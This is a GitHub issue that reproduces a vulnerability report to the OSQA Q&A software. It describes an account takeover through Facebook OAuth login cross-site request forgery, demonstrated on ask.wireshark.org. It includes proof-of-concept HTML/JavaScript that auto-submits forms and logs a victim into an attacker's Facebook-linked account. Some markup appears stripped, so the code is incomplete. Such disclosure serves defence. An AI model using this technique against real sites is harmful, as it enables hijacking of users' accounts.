[OSQA-954] Account takeover using facebook OAuth #503

Open
javierder opened this Issue May 13, 2015 · 0 comments

Projects

None yet

1 participant

@javierder
Member

[reporter="d3xt0r", created="Thu, 28 Aug 2014 08:41:28 -0400"]
Hey !!




Its me Daksh Patel here ! I would like to report Account takeover using facebook OAuth. I tested this on wireshark . (https://ask.wireshark.org/account/signin/)




Steps to reproduce :



  1. First allow any app to your facebook account like i tested on wireshark.

2) Now open your account and use this files . open this test.html file and it ll call the fb_login.html file and bang !! This ll add the attackers facebook account in victim.

Save the test.html and fb_login.html

I) test.html contains the the auth link to facebook . First open this file :

//test.html


  
   <script type="text/javascript">
 
  function fb_login() {
    return (window.open("./fb_login.html", "_blank",
"status=0,scrollbars=0,menubar=0,resizable=0,scrollbars=0,width=1,height=1"));
  }
 
   function hi_addlogin() {
     document.getElementById("sForm").submit();
  }

 
   function pwn() {
     win1 = fb_login();
     setTimeout("hi_addlogin()", 7000);
     //win1.close()
     win2 = agree();
     setTimeout("fb_login()", 7000);
     //win2.close()
  }
 
   </script>
 
 
 
     action="https://ask.wireshark.org/account/facebook/signin/" method="GET">
      
       value="https://graph.facebook.com/oauth/authorize"
/>
      
    
 
  pwn
  


II) fb_login file contains the facebook login . Change the email and password in this file .


 
   <script type="text/javascript">
  function post_without_referer() {
    // POST request, WebKit & Firefox. Data, meta & form submit trinity
   location = 'data:text/html,https://www.facebook.com/login.php?login_attempt=1\'>' +
              '' +
              '' +
              '' +
              '<script>document.getElementById(\'dynForm\').submit()">';
}
 
   </script>
  


//change the email and password.

//to get victim logged in attacker's account


Lemme know if you need any help .

Regards,
Daksh Patel
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment